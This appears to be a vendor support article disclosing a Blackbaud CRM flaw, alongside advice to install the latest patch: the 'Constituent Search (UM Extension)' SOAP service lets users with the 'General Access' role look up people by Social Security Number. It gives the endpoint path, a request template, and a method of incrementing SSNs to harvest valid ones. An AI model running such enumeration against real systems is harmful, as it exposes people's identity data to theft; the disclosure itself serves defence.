Using Webservices Constituent Search Vulnerability

In creating a web service application, an authenticated authorized BBEC user with the "General Access" role can query the "Constituent Search (UM Extension)" service to match valid Social Security Numbers to constituent causing a search vulnerability.
Download and install the latest patch, which contains all fixes from previous patches. If you are running an older version, download and install the latest version and then the patch. 


Here are the steps:

1. Log in as a user with the "General Access" role (I don’t know if this is a role we created, or one that came configured with the CRM).

2. POST a request to the "Constituent Search (UM Extension)" endpoint (/bbappfx/vpp/bizops/db%5BBTP_PROD%5D/searchlists/76d8c79c-b8d4-4349-beb5-283b4bad4285/soap.asmx) with the following contents:

<soapenv:Envelope xmlns:soapenv="<http://schemas.xmlsoap.org/soap/envelope/>" xmlns:blac="blackbaud_appfx_server_bizops">

<soapenv:Header/>

<soapenv:Body>

<blac:SearchRequest>

<!--Optional:-->

<blac:SessionKey>[session key as needed]</blac:SessionKey>

<!--Optional:-->

<blac:Criteria>

<!--Optional:-->

<blac:SSN>[SSN to test]</blac:SSN>

</blac:Criteria>

</blac:SearchRequest>

</soapenv:Body>

</soapenv:Envelope>

3. If the SSN is valid and the corresponding person exists in the database, a record will be returned that contains identifying information.

4. For the next request, the SSN can be incremented by one, or chosen in some other manner, and the POST would be repeated with the new SSN.

To fully exploit this, an authenticated and authorized attacker would send repeated requests and record any hits on real records. I was able to get a hit rate of about 2% in my tests, which allowed harvesting of more than 1,200 valid SSNs in around ten minutes.

Environment

 2.91.1535, patch 36

Was this article helpful?